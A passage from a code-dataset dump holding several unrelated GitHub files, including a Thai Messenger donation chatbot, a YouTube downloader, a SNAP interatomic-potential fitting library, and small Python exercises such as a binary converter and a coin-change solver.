'ขณะนี้เหมียวเทใจยังไม่มีแนวทางรับเรื่องนี้ กรุณาติดต่อช่องทางอื่นๆก่อนนะ แต่ถ้ามีข่าวอัพเดทจะรีบแจ้งให้ทราบนะเมี๊ยว')\n else:\n # send_message(sender_id,'ยังไม่เข้าใจอ่ะเมี๊ยว')\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' : chatState})\n else:\n r = requests.get('https://graph.facebook.com/v2.6/'+sender_id+'?access_token='+default_config.FB_PAGE_TOKEN)\n data = r.json()\n user.insert({'sender_id' : sender_id, 'sender_name' : data['first_name'], 'chatState' : 0})\n k = user.find({'sender_id' : sender_id}).sort(\"_id\",-1).limit(1)\n for doc in k:\n greeting(sender_id, message_text,doc)\n return ''\n\ndef sendProjectCard(result, sender_id):\n elements = []\n for cardData in result:\n elements.append({\"title\": cardData['name'], \"subtitle\" : \"เป้าหมาย \" + str(cardData['donation_limit']),\n \"image_url\":\"https://taejai.com/media/\" + cardData['cover_image'], \"buttons\": [{\"type\":\"web_url\",\"url\":\"https://taejai.com/th/d/\"+cardData['slug'],\"title\":\"เวปไซตโครงการ\"},{\"type\":\"web_url\",\"title\":\"บริจาค\",\"url\":\"https://taejai.com/th/d/\" + cardData['slug'] + '/#donate'}]})\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'generic',\n 'elements': elements\n }\n }\n }\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n return\n\ndef resendPostBack(sender_id, message_text):\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'button',\n 'text':message_text,\n 'buttons':[{\n 
'type':'postback',\n 'title':'ค้นหาใหม่',\n 'payload':'ค้นหา'\n }]\n }\n }\n }\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n return ''\n\ndef searchProject(sender_id, message_text,doc):\n if(doc['chatState'] == 0):\n chatState = 1\n send_message(sender_id, 'ให้เหมียวช่วยหาโครงการเกี่ยวกับอะไรดีล่ะ ? ')\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' : chatState})\n else:\n a = str(datetime.now())\n date = a[0:10]\n taejai = mongo.db.taejai\n predict = predictProject(message_text)\n result = taejai.find({'id' : int(predict), 'end_date' : {'$gte' : date}})\n # result = taejai.find({'name' : {'$regex': message_text, '$options' : 'i'}, 'end_date' : {'$gte': date} }).limit(3)\n if result.count() <= 0:\n resendPostBack(sender_id, 'เหมียว ลองหาแล้วแต่ไม่เจอเลยอ่ะ ลองค้นหาใหม่ดูนะ')\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' : 0})\n return\n sendProjectCard(result, sender_id)\n chatState = 0\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' : chatState})\n return\n\ndef tadkaam(txt):\n bd = PyICU.BreakIterator.createWordInstance(PyICU.Locale(\"th\"))\n bd.setText(txt)\n lastPos = bd.first()\n retTxt = \"\"\n try:\n while(1):\n currentPos = next(bd)\n retTxt += txt[lastPos:currentPos]\n if(currentPos < len(txt)):\n retTxt += \"|\"\n lastPos = currentPos\n except StopIteration:\n pass\n words = retTxt.split('|')\n return words\n\ndef predictProject(txt):\n k = ''\n result = function.get_result(txt)\n for res in result:\n k += str(res)\n return k\n\n\n","repo_name":"numchiew/taejaiBot-demo","sub_path":"app/app/webhook/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":14225,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39295787635","text":"import pytube\nimport shutil\n\n\nprint('\\nCole o Link do video aqui: ')\nlink = input()\n\ndef baixar(link, extencao):\n yt = pytube.YouTube(link) #Prepara\n titulo = yt.title\n print(f'\\nBaixando: {titulo}...\\n')\n ys = yt.streams.get_highest_resolution()#Melhor resolução\n ys.download() #Download\n #Tirando Caracteres especiais\n titulo = titulo.replace('|','')\n titulo = titulo.replace('#','')\n titulo = titulo.replace('?','')\n titulo = titulo.replace(',','')\n print('\\n')\n caminho_original =r'D:\\Brincadeiras em Python\\{}.mp4'.format(titulo)# Caminho Depois de baixar\n caminho_novo = r'C:\\Users\\leona\\Downloads\\{}'.format(titulo)#Pasta Downloads\n caminho_novo = caminho_novo+extencao\n print(caminho_novo,' ',caminho_original)\n shutil.move(caminho_original,caminho_novo)# Movendo o video\n print(f'\\n\\nVocê pode ver o arquivo em {caminho_novo}\\n\\n') #Local completo do video\n\nbaixar(link,'.mp3')\nbaixar(link,'.mp4')","repo_name":"LeonardoMaragna11/BaixarVideosdoyoutubecompython","sub_path":"Pytube 2.0.py","file_name":"Pytube 2.0.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70165194410","text":"#!/usr/bin/env python\nfrom pathlib import Path\n\nimport setuptools\nfrom setuptools import setup\n\n\ndef load_reqs(path):\n reqs = 
[]\n with open(path, \"r\") as f:\n for line in f.readlines():\n if line.startswith(\"-r\"):\n reqs += load_reqs(line.split(\" \")[1].strip())\n else:\n req = line.strip()\n if req and not req.startswith(\"#\"):\n reqs.append(req)\n return reqs\n\n\nreq_path = Path(__file__).parent / \"requirements.txt\"\nrequirements = load_reqs(req_path)\n\nlong_description = open(Path(__file__).parent / \"README.md\").read()\n\n\nsetup(\n name=\"pandas_path\",\n url=\"https://github.com/drivendataorg/pandas-path\",\n project_urls={\n \"Source Code\": \"https://github.com/drivendataorg/pandas-path\",\n \"DrivenData\": \"http://drivendata.co\",\n },\n version=\"0.3.0\",\n author=\"DrivenData\",\n author_email=\"info@drivendata.org\",\n include_package_data=True,\n description=\"Pathlib functionality for pandas.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license=\"MIT\",\n packages=setuptools.find_packages(),\n keywords=[\"data science\"],\n python_requires=\">=3.6\",\n install_requires=requirements,\n classifiers=[\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n # Indicate who your project is intended for\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n ],\n)\n","repo_name":"drivendataorg/pandas-path","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"12431707202","text":"from flask import abort\nimport requests\n\ndef authControl(headers):\n url = 'http://localhost:8000/api/tokenCheck'\n\n response = requests.post(url, headers={\n 'Authorization': headers.get('Authorization'),\n 'userId': headers.get('userId')\n })\n if response.status_code != 200 or response.text == 'false':\n abort(401, 'Token Is Invalid')\n else:\n print('Token success')\n","repo_name":"selahattingns/python-mongodb-microservice","sub_path":"app/middlewares/auth_middleware.py","file_name":"auth_middleware.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40845531667","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import ParameterGrid\nfrom itertools import product\n\nfrom explore.CatCat import CatCat\n\n\ndef data_iter():\n\n np.random.seed(2342)\n\n n = 30\n\n # 2 classes\n a = np.random.choice([0, 1], size=n).astype(str)\n b = np.random.choice([0, 1, 3], size=n).astype(str)\n\n for a, b in format_iter(a, b):\n yield a, b\n\n\ndef format_iter(a, b):\n \"\"\"\n Iterates over various formats\n \"\"\"\n\n yield a, b\n\n a = pd.Series(a)\n b = pd.Series(b)\n yield a, b\n\n a = a.astype('category')\n yield a, b\n\n a.name = 'woof'\n b.name = 'meow'\n yield a, b\n\n a.iloc[0] = np.nan\n b.iloc[1] = np.nan\n yield a, b\n\n\ndef settings_iter():\n settings = {'alpha': [0.05],\n 'nan_how': ['drop', 'leave']}\n\n for setting in ParameterGrid(settings):\n yield setting\n\n\ndef test_settings():\n \"\"\"\n Makes sure different settings of ContCont run.\n \"\"\"\n\n for (cont, cat), settings in product(data_iter(),\n settings_iter()):\n\n test = CatCat(**settings)\n test = test.fit(cont, cat)\n test.plot()\n assert 
True\n","repo_name":"idc9/explore","sub_path":"explore/tests/test_CatCat.py","file_name":"test_CatCat.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8254532629","text":"from multiprocessing import allow_connection_pickling\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom monty.serialization import loadfn\nfrom maml.utils import pool_from, convert_docs\nimport json\nimport os\nimport random\nimport subprocess\nimport glob, shutil\n\n# local environment descriptors imports\nfrom maml.describers import BispectrumCoefficients\nfrom sklearn.decomposition import PCA\n\n# machine learning interatomic potentials imports\nfrom maml.base import SKLModel\nfrom maml.apps.pes import SNAPotential\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.linear_model import LinearRegression\n\nimport pandas as pd\n\n# materials properties prediction imports\nfrom pymatgen.core import Structure, Lattice\nfrom maml.apps.pes import LatticeConstant, ElasticConstant, NudgedElasticBand, DefectFormation\n\n# disable logging information\nimport logging\nlogging.disable(logging.CRITICAL)\nimport warnings\nwarnings.simplefilter('ignore')\nimport time\nfrom monty.os.path import which\n\nfrom snap_metrics import *\nfrom lammps import lammps\n\ndef load_folder(folder, verbose = False):\n ############### <<< LOAD DATA #####################\n if folder[-1]!=\"/\": folder=folder+\"/\"\n filelist_in_folder = os.listdir(folder)\n datalist={filename : loadfn(folder+filename)[0] for filename in filelist_in_folder}\n\n if verbose: print(\"Loaded {} , {} files (configurations)\".format(folder, len(datalist)))\n\n structures = [datalist[filename]['structure'] for filename in datalist]\n energies = [datalist[filename]['data']['energy_per_atom']*len(datalist[filename]['structure']) for filename in datalist] ### if 'outputs' in vaspdata[0] : energies = [d['outputs']['energy'] for d in vaspdata]\n forces = [datalist[filename]['data']['forces'] for filename in datalist] ### if 'outputs' in vaspdata[0] : forces = [d['outputs']['forces'] for d in vaspdata]\n stresses = [datalist[filename]['data']['virial_stress'] for filename in datalist]\n stresses = [[stress/10.0 for stress in tenz] for tenz in stresses] ### maml wants GPa\n\n if verbose: print(\" # of structures in data: {}\\n\".format(len(structures)),\n \"# of energies in data: {}\\n\".format(len(energies)),\n \"# of forces in data: {}\\n\".format(len(forces)))\n\n feature_types = []\n feature_filename = []\n for num, configuration in enumerate(structures):\n if len(configuration)>1 : feature_types.append(\"en\")\n else : feature_types.append(\"en0\")\n feature_filename.append(filelist_in_folder[num])\n\n for LatticeCite in configuration:\n for i in range(3) : \n feature_types.append(str(LatticeCite.species.elements[0]))\n feature_filename.append(filelist_in_folder[num])\n for i in range(6) : \n feature_types.append(\"st\") \n feature_filename.append(filelist_in_folder[num])\n folder = folder[:-1]\n #Возвращает кортеж соответствующих списков - структуры, энергии, силы, давления и список типов фичей, полученные из всех структур в папке\n return({'structures': structures, 'energies': energies, 'forces': forces, 'stresses': stresses, 'feature_types' : feature_types, 'feature_folder' : folder, 'feature_filename' : feature_filename})\n\n\ndef weights_in_set(set, set_weight, elem_weight_list, 
energy_weight, stress_weight, name_l, en0_weight = 20.0):\n en_weight_default = energy_weight/0.1 ### Ошибка в 0.1 эВ/атом равносильна ошибке в 1 эВ/А\n st_weight_default = stress_weight/100 ### Ошибка в 100 GPa равносильна ошибке в 1 эВ/А , 6 компонент\n f_weight_default = 1 ## \n\n weights_in_set = []\n en_count = set[\"feature_types\"].count(\"en0\")+set[\"feature_types\"].count(\"en\")\n st_count = set[\"feature_types\"].count(\"st\")\n f_count = (len(set[\"feature_types\"]) - en_count - st_count)/en_count\n for feature_type in set[\"feature_types\"]:\n weight = 1.0\n if feature_type == \"en0\" : weight = en0_weight * en_weight_default*set_weight/en_count\n if feature_type == \"en\" : weight = en_weight_default*set_weight\n for i in range(len(name_l)):\n if feature_type == name_l[i] : weight = f_weight_default*elem_weight_list[i]*set_weight/f_count\n if feature_type == \"st\" : weight = st_weight_default*set_weight/6.0\n weights_in_set.append(weight)\n return(weights_in_set)\n\ndef concatenate_sets(list_of_sets):\n structures = [a for set in list_of_sets for a in set['structures']]\n energies = [a for set in list_of_sets for a in set['energies']]\n forces = [a for set in list_of_sets for a in set['forces']]\n stresses = [a for set in list_of_sets for a in set['stresses']]\n feature_types = [a for set in list_of_sets for a in set['feature_types']]\n folder = [set['feature_folder'] for set in list_of_sets for a in set['feature_types']]\n filenames = [a for set in list_of_sets for a in set['feature_filename']]\n return({'structures': structures, 'energies': energies, 'forces': forces, 'stresses': stresses, 'feature_types' : feature_types, 'feature_folder' : folder, 'feature_filename' : filenames})\n\ndef load_list_of_sets(folder_list, verbose = False):\n list_of_train_sets = [] \n for folder in folder_list:\n list_of_train_sets.append(load_folder(folder, verbose))\n return(list_of_train_sets)\n\nclass SNAP_model:\n def set_parameters(self, name_l,r_l,w_l, twojmax , quadratic = False, rcutfac = 0.5):\n self.file_param=open(\"param\", \"a\")\n self.n_threads = 128\n self.rcutfac = rcutfac\n self.name_l = name_l\n self.r_l = r_l\n self.w_l = w_l\n self.quadratic = quadratic\n self.twojmax = twojmax\n\n def update_weights(self, energy_weight, stress_weight , elem_weight_list, en0_weight=20.0):\n self.energy_weight = energy_weight\n self.stress_weight = stress_weight \n self.elem_weight_list = elem_weight_list\n self.en0_weight = en0_weight\n\n def update_set_weight_list(self, set_weight_list):\n self.set_weight_list = set_weight_list \n\n def write_features(self, set, label):\n per_force_features = self.per_force_describer.transform(set['structures'])\n per_force_features.to_csv('train_features_dataframe_'+label, sep=\",\")\n\n def write_snap_to_files(self):\n self.snap.write_param()\n\n def fit_SNAP(self, list_of_train_sets):\n\n if len(list_of_train_sets)!=len(self.set_weight_list) : \n print (\"Error len(self.list_of_train_sets)!=len(self.set_weight_list) \")\n quit() \n\n self.weights_all = []\n for s, set in enumerate(list_of_train_sets):\n self.weights_all+=weights_in_set(set, self.set_weight_list[s], self.elem_weight_list, self.energy_weight, self.stress_weight, self.name_l, en0_weight=self.en0_weight)\n\n\n self.train_set = concatenate_sets(list_of_train_sets)\n\n self.element_profile = {}\n for i in range(len(self.name_l)):\n self.element_profile.update({self.name_l[i]: {'r': self.r_l[i], 'w': self.w_l[i]}})\n\n\n warnings.filterwarnings(\"ignore\")\n\n self.per_force_describer = 
BispectrumCoefficients(rcutfac=self.rcutfac, twojmax=self.twojmax, \n element_profile=self.element_profile, \n quadratic=self.quadratic, \n pot_fit=True, \n include_stress=True, \n n_jobs=self.n_threads, verbose=False)\n tm=time.time()\n ml_model = LinearRegression()\n skl_model = SKLModel(describer=self.per_force_describer, model=ml_model)\n self.snap = SNAPotential(model=skl_model)\n # Train the potential with lists of structures, energies, forces\n self.snap.train(self.train_set['structures'], self.train_set['energies'], self.train_set['forces'], self.train_set['stresses'], include_stress=True, sample_weight=self.weights_all)\n for f in glob.glob(\"tmp*\"):\n shutil.rmtree(f, ignore_errors=True)\n self.write_snap_to_files()\n self.fit_info_str = \" En_w {:.3f} St_w {:.3f} // r_l {} w_l {} elem_w {} // folders {} /// \".format(self.energy_weight, self.stress_weight, str([round(i, 2) for i in self.r_l]), str([round(i, 2) for i in self.w_l]), str([round(i, 2) for i in self.elem_weight_list]), str([round(i, 2) for i in self.set_weight_list]) )\n\n def set_test_set(self, list_of_test_sets):\n self.list_of_test_sets = list_of_test_sets\n self.test_set = concatenate_sets(list_of_test_sets)\n\n def evaluate_testdata(self, test_set, label = \"\"): \n test_structures, test_energies, test_forces, test_stresses = test_set['structures'], test_set['energies'], test_set['forces'], test_set['stresses']\n test_feature_types, test_folder, test_filenames = test_set['feature_types'], test_set['feature_folder'], test_set['feature_filename']\n\n df_orig, df_predict = self.snap.evaluate(test_structures, test_energies, test_forces, test_stresses, include_stress=True)\n orig = df_orig['y_orig'] / df_orig['n']\n predict = df_predict['y_orig'] / df_predict['n']\n\n test_weights = weights_in_set(test_set, 1, self.elem_weight_list, self.energy_weight, self.stress_weight, self.name_l)\n\n evaluate_info_dataframe = pd.DataFrame({'orig': orig , 'predict': predict , 'weight': test_weights , 'feature_type' : test_feature_types, 'folder' : test_folder, 'filename' : test_filenames})\n evaluate_info_dataframe.to_csv('orig_vs_predict_'+label, sep=\" \")\n\n self.test_dataframe = evaluate_info_dataframe\n\n def count_RMSE_predictors(self):\n df = self.test_dataframe\n name_l = list(df.feature_type.unique()) ; name_l.remove(\"en\")\n if (\"en0\" in name_l) : name_l.remove(\"en0\")\n name_l.remove(\"st\") \n \n self.RMSE_f = {}\n for elem in name_l:\n self.RMSE_f.update({elem : round(mean_squared_error(df.orig[df.feature_type == elem], df.predict[df.feature_type == elem], squared=False), 3) })\n self.RMSE_e = mean_squared_error(df.orig[df.feature_type == \"en\"], df.predict[df.feature_type == \"en\"], squared=False)\n self.RMSE_s = mean_squared_error(df.orig[df.feature_type == \"st\"], df.predict[df.feature_type == \"st\"], squared=False) # mean_squared_error(original_stress, weighted_predict_stress)\n self.RMSE_f_total = mean_squared_error(df.orig[df['feature_type'].apply(lambda s: s in name_l )], df.predict[df['feature_type'].apply(lambda s: s in name_l )], squared=False)\n\n self.force_relative_err = self.RMSE_f_total/df.orig[df['feature_type'].apply(lambda s: s in name_l )].abs().mean()\n self.stress_relative_err = self.RMSE_s/df.orig[df.feature_type == \"st\"].abs().mean()\n self.energy_relative_err = self.RMSE_e/1 ### характерный порядок энергий, в рамках которого предсказываем - 1 эВ (df.orig[df.feature_type == \"en\"].max() - df.orig[df.feature_type == \"en\"].min())\n\n self.RMSE_predictors = 
mean_squared_error(df.orig, df.predict, squared=False, sample_weight = df.weight)\n self.RMSE_predictors_info_str = \" F {:.3f} (by elem {}) // EN {:.3f} // ST {:.3f} // All = {:.3f} \".format(self.RMSE_f_total, str(self.RMSE_f), self.RMSE_e, self.RMSE_s, self.RMSE_predictors )\n\n\n ############### ФУНКЦИИ ДЛЯ РАСЧЕТА ДЕФЕКТОВ ##################\n\n def evaluate_defects(self):\n self.lattice_constant = find_lattice_constant()\n defects = {}\n keys = ['ideal', 'Uvac', 'Nvac', 'Uint', 'UDD', 'Nint']\n for key in keys:\n defects[key] = calculate_defect_energy(self.lattice_constant, key)\n\n chempot = defects['ideal']/64\n defects['ideal'] = defects['ideal'] - 64*chempot\n defects['Uvac'] = defects['Uvac'] - 63*chempot\n defects['Nvac'] = defects['Nvac'] - 63*chempot\n defects['Uint'] = defects['Uint'] - 65*chempot\n defects['UDD'] = defects['UDD'] - 65*chempot\n defects['Nint'] = defects['Nint'] - 65*chempot\n\n reference = {'ideal' : 0.00, 'Uvac' : 3.25, \"Nvac\" : 1.88, 'Uint' : 7.07, 'Nint' : 3.17, 'UDD' : 5.00}\n\n self.defect_dataframe = pd.DataFrame({\"def\" : pd.Series(defects), \"ref\" : pd.Series(reference)}, index = pd.Series(defects).index)\n \n self.defect_dataframe.loc[\"UFP\"]=self.defect_dataframe.loc[\"Uvac\"]+self.defect_dataframe.loc[\"Uint\"]\n self.defect_dataframe.loc[\"NFP\"]=self.defect_dataframe.loc[\"Nvac\"]+self.defect_dataframe.loc[\"Nint\"]\n self.defect_dataframe.loc[\"UFP_DD\"]=self.defect_dataframe.loc[\"Uvac\"]+self.defect_dataframe.loc[\"UDD\"]\n self.defect_dataframe.loc[\"SD\"]=self.defect_dataframe.loc[\"Uvac\"]+self.defect_dataframe.loc[\"Nvac\"]\n self.defect_dataframe.loc[\"ASD\"]=self.defect_dataframe.loc[\"Uint\"]+self.defect_dataframe.loc[\"Nint\"]\n self.defect_dataframe.loc[\"ASD_DD\"]=self.defect_dataframe.loc[\"UDD\"]+self.defect_dataframe.loc[\"Nint\"]\n\n self.defect_dataframe['diff'] = (self.defect_dataframe['def'] - self.defect_dataframe['ref']).round(decimals=2)\n self.defect_dataframe['def'].round(decimals=2)\n self.neutral_def=self.defect_dataframe.loc[['UFP','NFP','UFP_DD', 'SD', 'ASD', 'ASD_DD']]\n self.RMSE_def = np.sqrt(mean_squared_error(self.neutral_def['def'], self.neutral_def['ref']))\n self.RMSE_defects_info_str = \" // RMSE_DEF = {:.3f} // \".format(self.RMSE_def)\n\nclass DE_algo:\n def set_de_parameters(self, mut=0.8, crossp=0.7, popsize=20, its=10000):\n self.mut = mut\n self.crossp=crossp\n self.popsize=popsize \n self.its=its\n\n def set_name_l(self, name_l):\n self.name_l = name_l\n\n def set_snap_parameters(self, quadratic=True, twojmax=6):\n self.quadratic=quadratic\n self.twojmax=twojmax\n\n def set_train_test_data(self, list_of_train_sets, list_of_test_sets=\"nan\",):\n self.list_of_train_sets = list_of_train_sets\n if list_of_test_sets==\"nan\": self.list_of_test_sets = list_of_train_sets\n else: self.list_of_test_sets = list_of_test_sets\n self.test_set = concatenate_sets(self.list_of_test_sets)\n\n def set_bounds(self, bounds_universal, bounds_per_element, bounds_folders):\n self.bounds_universal = bounds_universal\n self.bounds_per_element = bounds_per_element\n self.bounds_folders = bounds_folders\n\n def set_metric_func(self, metric_func):\n self.metric_func = metric_func\n\n def concatenate_bounds(self, log_folder_weight = False, log_universal_weights = False):\n def to_tuple(tuple_or_number):\n if type(tuple_or_number)==tuple: return tuple_or_number\n else: return (tuple_or_number, tuple_or_number)\n\n self.bounds = []\n self.bounds.append(to_tuple(self.bounds_universal['en_weight']))\n 
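        # Aside (hedged, illustrative only): the DE loop in perform() below works on a
        # population normalized to [0, 1]; with the (min, max) bounds packed above it is
        # denormalized as  denorm = min_b + pop * |min_b - max_b|.
        # A tiny standalone check of that mapping, using made-up bounds (kept as a
        # comment so it does not execute inside this method):
        #
        #     import numpy as np
        #     min_b, max_b = np.array([0.1, 1.0]), np.array([2.0, 5.0])
        #     pop = np.array([[0.0, 0.5], [1.0, 1.0]])
        #     assert np.allclose(min_b + pop * np.fabs(min_b - max_b),
        #                        [[0.1, 3.0], [2.0, 5.0]])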
self.bounds.append(to_tuple(self.bounds_universal['st_weight']))\n\n for elem in self.name_l:\n self.bounds.append(to_tuple(self.bounds_per_element[elem]['r_c']))\n self.bounds.append(to_tuple(self.bounds_per_element[elem]['w_sna']))\n self.bounds.append(to_tuple(self.bounds_per_element[elem]['weight_of_elem_force'])) \n \n for bound in self.bounds_folders:\n self.bounds.append(to_tuple(bound))\n\n def unpack_de_parameter(self, de_parameter_list):\n de_parameter_list = list(de_parameter_list)\n self.energy_weight = de_parameter_list.pop(0)\n self.stress_weight = de_parameter_list.pop(0)\n self.r_l = []\n self.w_l = []\n self.elem_weight_list = []\n for elem in self.name_l:\n self.r_l.append(de_parameter_list.pop(0))\n self.w_l.append(de_parameter_list.pop(0))\n self.elem_weight_list.append(de_parameter_list.pop(0))\n\n self.set_weight_list = de_parameter_list\n\n def perform(self):\n self.de_fit_num = 0\n self.concatenate_bounds()\n print('SSSSSSSSSS')\n dimensions = len(self.bounds)\n pop = np.random.rand(self.popsize, dimensions)\n min_b, max_b = np.asarray(self.bounds).T\n diff = np.fabs(min_b - max_b)\n pop_denorm = min_b + pop * diff\n print('SSSS')\n fitness = np.asarray([self.fit_function(ind) for ind in pop_denorm])\n best_idx = np.argmin(fitness)\n best = pop_denorm[best_idx]\n print(\"Population made\")\n for i in range(self.its):\n for j in range(self.popsize):\n idxs = [idx for idx in range(self.popsize) if idx != j]\n a, b, c = pop[np.random.choice(idxs, 3, replace = False)]\n mutant = np.clip(a + self.mut * (b - c), 0, 1)\n cross_points = np.random.rand(dimensions) < self.crossp\n if not np.any(cross_points):\n cross_points[np.random.randint(0, dimensions)] = True\n trial = np.where(cross_points, mutant, pop[j])\n trial_denorm = min_b + trial * diff\n f = self.fit_function(trial_denorm)\n if f < fitness[j]:\n fitness[j] = f\n pop[j] = trial\n if f < fitness[best_idx]:\n best_idx = j\n best = trial_denorm\n #yield best, fitness[best_idx]\n\n def fit_function(self, de_parameter_list):\n self.de_fit_num+=1\n self.unpack_de_parameter(de_parameter_list)\n self.snap_model = SNAP_model()\n self.snap_model.set_parameters(self.name_l, self.r_l, self.w_l, quadratic=self.quadratic, twojmax=self.twojmax) \n self.snap_model.update_weights(energy_weight=self.energy_weight,stress_weight=self.stress_weight, elem_weight_list=self.elem_weight_list, en0_weight=100)\n self.snap_model.update_set_weight_list(self.set_weight_list)\n self.snap_model.fit_SNAP(self.list_of_train_sets)\n self.snap_model.set_test_set(self.list_of_test_sets)\n self.metric_result = self.metric_func(self.snap_model)\n self.de_output()\n return(self.metric_result)\n\n def de_output(self):\n f=open(\"DE_history.txt\", \"a\")\n\n print(self.de_fit_num, end = ' ')\n print(self.snap_model.fit_info_str, end = ' ')\n print(self.snap_model.RMSE_predictors_info_str, end = ' ')\n print(self.snap_model.RMSE_defects_info_str, end = '\\n')\n print(\" MY METRIC = \"+str(round(self.metric_result,2)), end = '\\n')\n\n f.write(str(self.de_fit_num)+\")) \")\n f.write(self.snap_model.fit_info_str+\" \")\n f.write(self.snap_model.RMSE_predictors_info_str+\" \")\n f.write(self.snap_model.RMSE_defects_info_str+\"\")\n f.write(\" MY METRIC = \"+str(round(self.metric_result,2))+\"\\n\")\n f.close()\n\n f=open(\"DE_big_history.txt\", \"a\") \n sm = self.snap_model\n par_list = [self.de_fit_num] + sm.r_l + sm.w_l + sm.elem_weight_list + [sm.energy_weight] + [sm.stress_weight] + sm.set_weight_list\n all_info_row = par_list + [sm.RMSE_f_total, 
sm.RMSE_e, sm.RMSE_s, sm.RMSE_predictors ] + list(sm.neutral_def['def'])\n f.write(str(all_info_row)[1:-1]+\"\\n\")\n f.close()\n\n\ndef check_bounds_consistance(obj_list, bounds):\n if len(obj_list)!=len(bounds): \n print(\"Bounds len error\") \n quit()","repo_name":"AlexanderAntropov/SNAP_MODULES","sub_path":"my_snap_lib.py","file_name":"my_snap_lib.py","file_ext":"py","file_size_in_byte":19687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74907787366","text":"def convertir_a_decimal(binario):\n res = 0\n for i in range(len(str(binario))):\n mult = int(binario[i]) * (2**i)\n res = res + mult\n return res\n\n\ndef convertir_a_binario(decimal):\n binario = \"\"\n while decimal // 2 != 0:\n binario = str(decimal % 2) + binario\n decimal = decimal // 2\n return str(decimal) + binario\n\n\ndef imprimir_resultado(resultado):\n print(\"El valor de {} es {}\".format(valor, resultado))\n\n\nopcion = int(input(\n \"1-> Para convertir de DECIMAL a BINARIO. \\n2-> Para convertir de BINARIO a DECIMAL.\\n¿Qué conversión deseas hacer? \"))\n\nif opcion == 1:\n valor = int(input(\"\\nIngresa el decimal: \"))\n conversion = convertir_a_binario(valor)\n imprimir_resultado(conversion)\nelif opcion == 2:\n valor = input(\"\\nIngresa el binario: \")\n conversion = convertir_a_decimal(valor)\n imprimir_resultado(conversion)\nelse:\n print(\"\\n{} no es una opción.\".format(opcion))\n","repo_name":"ALEXB0W/python_conversion_decimal_binario","sub_path":"binario-decimal.py","file_name":"binario-decimal.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28497638011","text":"from tkinter import *\nfrom random import randint\n\nroot=Tk()\nroot.title('Random Winner Generator')\nroot.iconbitmap('images/encrypt.ico')\nroot.geometry('400x400')\n\n\n\ndef pick():\n # 21 entries\n entries = ['Vishwa','Mandipa','Navitha','Supun','Yasitha','Miyuru','Chanithu','Sachin','Uthsala','Amayuru','Dulaj','Sithil','Yumeth','Sahan','Anupama','Dimuthu','Tharuka','Vihanga','Janidu','Hashen','Vishwa']\n \n # convert list to set (to remove duplicate values)\n entries_set=set(entries)\n \n # convert back to list - 20\n unique_entries=list(entries_set)\n\n # create our list size variable\n our_number = len(unique_entries)-1\n\n # create a random number between 0 and 19\n rando = randint(0,our_number)\n\n winnnerLabel=Label(root,text=unique_entries[rando],font=('Helvatica',18))\n winnnerLabel.pack(pady=50)\n\ntopLabel=Label(root,text='Win-O-Rama!',font=('Helvatica', 24))\ntopLabel.pack(pady=20)\n\nwinButton=Button(root,text='PICK OUR WINNERS!!',font=('Helvatica',24),command=pick)\nwinButton.pack(pady=20)\n\nroot.mainloop()","repo_name":"vps4618/Tkinter_Codemy","sub_path":"Random Winner Generator.py","file_name":"Random Winner Generator.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32739082165","text":"N, K = map(int,input().split())\r\n\r\ncoin = []\r\n\r\nfor i in range(N):\r\n c = int(input())\r\n coin.append(c)\r\n\r\nanswer = 0\r\nfor ablecoin in coin[::-1]:\r\n count = K // ablecoin\r\n if count > 0:\r\n answer += count\r\n K = K - count * ablecoin\r\n\r\nprint(answer)\r\n\r\n","repo_name":"SIDED00R/Code_training","sub_path":"백준/Silver/11047. 
